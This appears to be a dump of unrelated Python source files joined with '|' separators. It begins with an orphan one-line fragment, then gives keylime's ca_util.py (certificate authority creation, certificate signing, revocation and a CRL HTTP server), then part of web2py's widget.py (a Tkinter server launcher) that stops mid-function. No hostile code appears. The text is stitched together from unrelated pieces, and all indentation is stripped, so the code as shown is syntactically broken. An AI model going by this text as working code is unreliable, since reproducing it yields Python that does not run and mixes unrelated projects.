return [c for c in choices if c.choice_id == choice_id and c.is_right]
|
ca_util.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage ;
# Create a temporary CA cert and it's private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
from cryptography import exceptions as crypto_exceptions
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import fs_util
from keylime import json
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception(f"Unknown CA implementation: {config.CA_IMPL}")
global_password = None
def load_cert_by_path(cert_path):
cert = None
with open(cert_path, 'rb') as ca_file:
cert = x509.load_pem_x509_certificate(
data=ca_file.read(),
backend=default_backend(),
)
return cert
def setpassword(pw):
global global_password
if len(pw) == 0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir, name):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
cacert = load_cert_by_path('cacert.crt')
ca_pk = serialization.load_pem_private_key(
priv[0]['ca'],
password=None,
backend=default_backend()
)
cert, pk = ca_impl.mk_signed_cert(
cacert, ca_pk, name, priv[0]['lastserial'] + 1)
with open(f'{name}-cert.crt', 'wb') as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
priv[0][name] = pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# increment serial number after successful creation
priv[0]['lastserial'] += 1
write_private(priv)
with os.fdopen(os.open(f"{name}-private.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(priv[0][name])
with os.fdopen(os.open(f"{name}-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
cc = load_cert_by_path(f'{name}-cert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cc.signature,
cc.tbs_certificate_bytes,
padding.PKCS1v15(),
cc.signature_hash_algorithm,
)
logger.info("Created certificate for name %s successfully in %s", name, workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
priv = read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.public_bytes(serialization.Encoding.PEM))
priv[0]['ca'] = ca_pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
with os.fdopen(os.open("ca-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(ca_pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
# generate an empty crl
cacert_str = cacert.public_bytes(serialization.Encoding.PEM).decode()
crl = ca_impl.gencrl([], cacert_str, priv[0]['ca'].decode())
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
# Sanity checks...
cac = load_cert_by_path('cacert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cac.signature,
cac.tbs_certificate_bytes,
padding.PKCS1v15(),
cac.signature_hash_algorithm,
)
logger.info("CA certificate created successfully in %s", workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# zip up the crt, private key, and public key
with open('cacert.crt', 'rb') as f:
cacert = f.read()
with open(f"{name}-public.pem", 'rb') as f:
pub = f.read()
with open(f"{name}-cert.crt", 'rb') as f:
cert = f.read()
with open('cacrl.der', 'rb') as f:
crl = f.read()
with open('cacrl.pem', 'rb') as f:
crlpem = f.read()
cert_obj = x509.load_pem_x509_certificate(
data=cert,
backend=default_backend(),
)
serial = cert_obj.serial_number
subject = cert_obj.subject.rfc4514_string()
priv = read_private()
private = priv[0][name]
with open(f"{name}-private.pem", 'rb') as f:
prot_priv = f.read()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", private)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning(
"Unprotected private keys in cert package being written to disk")
with open(f'{name}-pkg.zip', 'wb') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile(f'{name}-pkg.zip', 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", prot_priv)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip",
name, name)
return pkg, serial, subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
if config.get('general', 'ca_implementation') == 'openssl':
with open(pemfile, 'w', encoding="utf-8") as f:
f.write("")
else:
cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
'-out', pemfile)
cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
cert_obj = load_cert_by_path(cert_path)
try:
crl_distpoints = cert_obj.extensions.get_extension_for_class(x509.CRLDistributionPoints).value
for dstpnt in crl_distpoints:
for point in dstpnt.full_name:
if isinstance(point, x509.general_name.UniformResourceIdentifier):
return point.value
except x509.extensions.ExtensionNotFound:
pass
logger.info("No CRL distribution points in %s", cert_path)
return ""
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
if name is not None and serial is not None:
raise Exception(
"You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = load_cert_by_path(f'{name}-cert.crt')
serial = cert.serial_number
# convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
if os.stat('cacrl.der').st_size:
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode()
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir, cert_path):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# just load up the password for later
read_private(True)
serveraddr = ('', config.CRL_PORT)
server = ThreadedCRLServer(serveraddr, CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s",
os.path.abspath("cacrl.der"))
with open('cacrl.der', 'rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d",
socket.getfqdn(), config.CRL_PORT)
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True: # pylint: disable=R1702
try:
if (os.path.exists('cacrl.der') and
os.stat('cacrl.der').st_size):
cmd = ('openssl', 'crl', '-inform', 'der', '-in',
'cacrl.der', '-text', '-noout')
retout = cmd_exec.run(cmd)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(
line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
if expire <= in1hour:
logger.info(
"Certificate to expire soon %s, re-issuing", expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
# server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type', None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s", revocation)
return
logger.info("Revoking certificate: %s", serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(
revoke_callback, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning(
"No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self, crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from %s with uri: %s', str(self.client_address), self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password, salt)
ciphertext = crypto.encrypt(priv_encoded, key)
towrite = {'salt': salt, 'priv': ciphertext}
with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w', encoding="utf-8") as f:
yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
global global_password
if global_password is None:
setpassword(getpass.getpass(
"Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml', encoding="utf-8") as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password, toread['salt'])
try:
plain = crypto.decrypt(toread['priv'], key)
except ValueError as e:
raise Exception("Invalid password for keystore") from e
return yaml.load(plain, Loader=SafeLoader), toread['salt']
if warn:
# file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet.",
os.path.abspath("private.yml"))
logger.warning(
"Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
def main(argv=sys.argv): #pylint: disable=dangerous-default-value
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command', action='store', dest='command',
required=True, help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name', action='store',
help='the common name of the certificate to create')
parser.add_argument('-d', '--dir', action='store',
help='use a custom directory to store certificates and keys')
parser.add_argument('-i', '--insecure', action='store_true', default=False,
help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
args = parser.parse_args(argv[1:])
if args.dir is None:
if os.getuid() != 0 and config.REQUIRE_ROOT:
logger.error(
"If you don't specify a working directory, this process must be run as root to access %s", config.WORK_DIR)
sys.exit(-1)
workingdir = config.CA_WORK_DIR
else:
workingdir = args.dir
# set a conservative general umask
os.umask(0o077)
if args.command == 'init':
cmd_init(workingdir)
elif args.command == 'create':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir, args.name)
elif args.command == 'pkg':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir, args.name, args.insecure)
elif args.command == 'revoke':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command == 'listen':
if args.name is None:
args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
logger.warning("using default name for revocation cert %s",
args.name)
cmd_listen(workingdir, args.name)
else:
logger.error("Invalid command: %s", args.command)
parser.print_help()
sys.exit(-1)
|
widget.py
|
# -*- coding: utf-8 -*-
# vim: set ts=4 sw=4 et ai:
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
GUI widget and services start function
--------------------------------------
"""
from __future__ import print_function
import time
import sys
import os
from collections import OrderedDict
import socket
import threading
import math
import logging
import signal
import getpass
from gluon.fileutils import read_file, create_welcome_w2p
from gluon.shell import die, run, test
from gluon._compat import PY2, xrange
from gluon.utils import (getipaddrinfo, is_loopback_ip_address,
is_valid_ip_address)
from gluon.console import is_appdir, console
from gluon import newcron
from gluon import main
from gluon.settings import global_settings
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
time.localtime().tm_year)
ProgramVersion = read_file('VERSION').rstrip()
if sys.version_info < (2, 7) or (3, 0) < sys.version_info < (3, 5):
from platform import python_version
sys.stderr.write("Warning: web2py requires at least Python 2.7/3.5"
" but you are running %s\n" % python_version())
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
# see "python -m unittest -h" for unittest options help
# NOTE: someone might be interested either in using the
# -f (--failfast) option to stop testing on first failure, or
# in customizing the test selection, for example to run only
# 'gluon.tests.<module>', 'gluon.tests.<module>.<class>' (this
# could be shortened as 'gluon.tests.<class>'), or even
# 'gluon.tests.<module>.<class>.<method>' (or
# the shorter 'gluon.tests.<class>.<method>')
call_args = ['-m', 'unittest', '-c', 'gluon.tests']
if options.verbose:
call_args.insert(-1, '-v')
if options.with_coverage:
try:
import coverage
except:
die('Coverage not installed')
if not PY2:
sys.stderr.write('Experimental ')
sys.stderr.write("Python %s\n" % sys.version)
if options.with_coverage:
coverage_exec = 'coverage2' if PY2 else 'coverage3'
coverage_config_file = os.path.join('gluon', 'tests', 'coverage.ini')
coverage_config = os.environ.setdefault("COVERAGE_PROCESS_START",
coverage_config_file)
run_args = [coverage_exec, 'run', '--rcfile=%s' % coverage_config]
# replace the current process
os.execvpe(run_args[0], run_args + call_args, os.environ)
else:
run_args = [sys.executable]
# replace the current process
os.execv(run_args[0], run_args + call_args)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
elif host == '0.0.0.0':
host = '127.0.0.1'
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
def start_browser(url, startup=False):
if startup:
print('please visit:')
print('\t' + url)
print('starting browser...')
try:
import webbrowser
webbrowser.open(url)
except:
print('warning: unable to detect your browser')
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
if PY2:
import Tkinter as tkinter
import tkMessageBox as messagebox
else:
import tkinter
from tkinter import messagebox
root.withdraw()
bg_color = 'white'
self.root = tkinter.Toplevel(root, bg=bg_color)
self.root.resizable(0, 0)
self.root.title(ProgramName)
self.options = options
self.scheduler_processes_lock = threading.RLock()
self.scheduler_processes = OrderedDict()
iconphoto = os.path.join('extras', 'icons', 'web2py.gif')
if os.path.exists(iconphoto):
img = tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
self.menu = tkinter.Menu(self.root)
servermenu = tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(options.folder, options.log_filename)
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
self.schedmenu = tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
# register and start schedulers
self.update_schedulers(start=True)
helpmenu = tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
ProgramInfo = """%s
%s
%s""" % (ProgramName, ProgramAuthor, ProgramVersion)
item = lambda: messagebox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = tkinter.NW
# Prepare the logo area
self.logoarea = tkinter.Canvas(self.root,
background=bg_color,
width=300,
height=300)
self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
self.logoarea.after(1000, self.update_canvas)
logo = os.path.join('extras', 'icons', 'splashlogo.gif')
if os.path.exists(logo):
img = tkinter.PhotoImage(file=logo)
pnl = tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
# Prepare the banner area
self.bannerarea = tkinter.Canvas(self.root,
bg=bg_color,
width=300,
height=300)
self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
tkinter.Label(self.bannerarea, anchor=tkinter.N,
text=str(ProgramVersion + "\n" + ProgramAuthor),
font=('Helvetica', 11), justify=tkinter.CENTER,
foreground='#195866', background=bg_color,
height=3).pack(side='top',
fill='both',
expand='yes')
self.bannerarea.after(1000, self.update_canvas)
# IP
# retrieves the list of server IP addresses
try:
if_ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
if_ips = []
tkinter.Label(self.root,
text='Server IP:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=4,
column=1,
sticky=sticky)
self.ips = {}
self.selected_ip = tkinter.StringVar()
row = 4
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in if_ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = tkinter.Radiobutton(
self.root, bg=bg_color, highlightthickness=0,
selectcolor='light grey', width=30,
anchor=tkinter.W, text='%s (%s)' % (legend, ip),
justify=tkinter.LEFT,
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=2, sticky=sticky)
if row == 4:
self.ips[ip].select()
row += 1
shift = row
# Port
tkinter.Label(self.root,
text='Server Port:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=shift,
column=1, pady=10,
sticky=sticky)
self.port_number = tkinter.Entry(self.root)
self.port_number.insert(tkinter.END, options.port)
self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
# Password
tkinter.Label(self.root,
text='Choose Password:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=shift + 1,
column=1,
sticky=sticky)
self.password = tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=2, sticky=sticky)
# Prepare the canvas
self.canvas = tkinter.Canvas(self.root,
width=400,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
sticky=sticky)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
sticky=sticky)
# Start button
self.button_start = tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0, sticky=sticky)
# Stop button
self.button_stop = tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1, sticky=sticky)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.isdir(os.path.join(applications_folder, arq))
]
with self.scheduler_processes_lock:
# reset the menu
# since applications can disappear (be disinstalled) must
# clear the menu (should use tkinter.END or tkinter.LAST)
self.schedmenu.delete(0, 'end')
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda a=arq: self.try_start_scheduler(a)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda a=arq: self.try_stop_scheduler(a)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
if start and self.options.with_scheduler and self.options.schedulers:
# the widget takes care of starting the schedulers
apps = [ag.split(':', 1)[0] for ag in self.options.schedulers]
else:
apps = []
for app in apps:
self.try_start_scheduler(app)
def start_schedulers(self, app):
from multiprocessing import Process
code = "from gluon.globals import current;current._scheduler.loop()"
print('starting scheduler from widget for "%s"...' % app)
args = (app, True, True, None, False, code, False, True)
p = Process(target=run, args=args)
with self.scheduler_processes_lock:
self.scheduler_processes[app] = p
self.update_schedulers()
print("Currently running %s scheduler processes" % (
len(self.scheduler_processes)))
p.start()
print("Processes started")
def try_stop_scheduler(self, app, skip_update=False):
p = None
with self.scheduler_processes_lock:
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
if p is not None:
p.terminate()
p.join()
if not skip_update:
self.update_schedulers()
def try_start_scheduler(self, app):
t = None
with self.scheduler_processes_lock:
if not is_appdir(self.options.folder, app):
self.schedmenu.delete("start %s" % app)
return
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
if t is not None:
t.start()
def checkTaskBar(self):
""" Checks taskbar status """
tb = self.tb
if tb.status:
st0 = tb.status[0]
EnumStatus = tb.EnumStatus
if st0 == EnumStatus.QUIT:
self.quit()
elif st0 == EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif st0 == EnumStatus.STOP:
self.stop()
elif st0 == EnumStatus.START:
self.start()
elif st0 == EnumStatus.RESTART:
self.stop()
self.start()
del tb.status[0]
self.root.after(1000, self.checkTaskBar)
def connect_pages(self):
""" Connects pages """
# reset the menu,
# since applications can disappear (be disinstalled) must
# clear the menu (should use tkinter.END or tkinter.LAST)
self.pagesmenu.delete(0, 'end')
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.exists(os.path.join(applications_folder, arq, '__init__.py'))
]
for arq in available_apps:
url = self.url + arq
item = lambda a=arq: self.try_start_browser(a)
self.pagesmenu.add_command(
label=url, command=item)
def try_start_browser(self, app):
url = self.url + app
if not is_appdir(self.options.folder, app):
self.pagesmenu.delete(url)
return
start_browser(url)
def quit(self, justHide=False):
""" Finishes the program execution """
if justHide:
self.root.withdraw()
else:
try:
with self.scheduler_processes_lock:
scheds = list(self.scheduler_processes.keys())
for t in scheds:
self.try_stop_scheduler(t, skip_update=True)
except:
pass
if self.options.with_cron and not self.options.soft_cron:
# shutting down hardcron
try:
newcron.stopcron()
except:
pass
try:
# HttpServer.stop takes care of stopping softcron
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Shows error message """
if PY2:
import tkMessageBox as messagebox
else:
from tkinter import messagebox
messagebox.showerror('web2py start server', message)
def start(self):
""" Starts web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except ValueError:
return self.error('invalid port number')
if self.options.server_key and self.options.server_cert:
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.update_schedulers()
# softcron is stopped with HttpServer, thus if starting again
# need to reset newcron._stopping to re-enable cron
if self.options.soft_cron:
newcron.reset()
# FIXME: if the HttpServer is stopped, then started again,
# does not start because of following error:
# WARNING:Rocket.Errors.Port8000:Listener started when not ready.
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.server_cert,
ssl_private_key=options.server_key,
ssl_ca_certificate=options.ca_cert,
min_threads=options.min_threads,
max_threads=options.max_threads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
threading.Thread(target=self.server.start).start()
except Exception as e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
cpt = threading.Thread(target=start_browser,
args=(get_url(ip, proto=proto, port=port), True))
cpt.setDaemon(True)
cpt.start()
self.password.configure(state='readonly')
for ip in self.ips.values():
ip.configure(state='disabled')
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stops web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
for ip in self.ips.values():
ip.configure(state='normal')
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Updates canvas """
httplog = os.path.join(self.options.folder, self.options.log_filename)
canvas = self.canvas
try:
t1 = os.path.getsize(httplog)
except OSError:
canvas.after(1000, self.update_canvas)
return
points = 400
try:
pvalues = self.p0[1:]
with open(httplog, 'r') as fp:
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
self.p0 = pvalues + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
for i in xrange(points - 1):
c = canvas.coords(self.q0[i])
canvas.coords(self.q0[i],
(c[0], self.p0[i],
c[2], self.p0[i + 1]))
self.t0 = t1
except AttributeError:
self.t0 = time.time()
self.t0 = t1
self.p0 = [100] * points
self.q0 = [canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(points - 1)]
canvas.after(1000, self.update_canvas)
def get_code_for_scheduler(applications_parent, app_groups):
app = app_groups[0]
if not is_appdir(applications_parent, app):
print("Application '%s' doesn't exist, skipping" % app)
return None, None
code = 'from gluon.globals import current;'
if len(app_groups) > 1:
code += "current._scheduler.group_names=['%s'];" % "','".join(
app_groups[1:])
code += "current._scheduler.loop()"
return app, code
def start_schedulers(options):
from multiprocessing import Process
apps = [ag.split(':') for ag in options.schedulers]
if not options.with_scheduler and len(apps) == 1:
app, code = get_code_for_scheduler(options.folder, apps[0])
if not app:
return
print('starting single-scheduler for "%s"...' % app)
run(app, True, True, None, False, code, False, True)
return
# Work around OS X problem: http://bugs.python.org/issue9405
if PY2:
import urllib
else:
import urllib.request as urllib
urllib.getproxies()
processes = []
for app_groups in apps:
app, code = get_code_for_scheduler(options.folder, app_groups)
if not app:
continue
print('starting scheduler for "%s"...' % app)
args = (app, True, True, None, False, code, False, True)
p = Process(target=run, args=args)
processes.append(p)
print("Currently running %s scheduler processes" % (len(processes)))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print("Processes started")
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print("Processes stopped")
except:
p.terminate()
p.join()
def start():
""" Starts server and other services """
# get command line arguments
options = console(version=ProgramVersion)
if options.with_scheduler or len(options.schedulers) > 1:
try:
from multiprocessing import Process
except:
die('Sorry, -K/--scheduler only supported for Python 2.6+')
if options.gae:
# write app.yaml, gaehandler.py, and exit
if not os.path.exists('app.yaml'):
name = options.gae
# for backward compatibility
if name == 'configure':
if PY2: input = raw_input
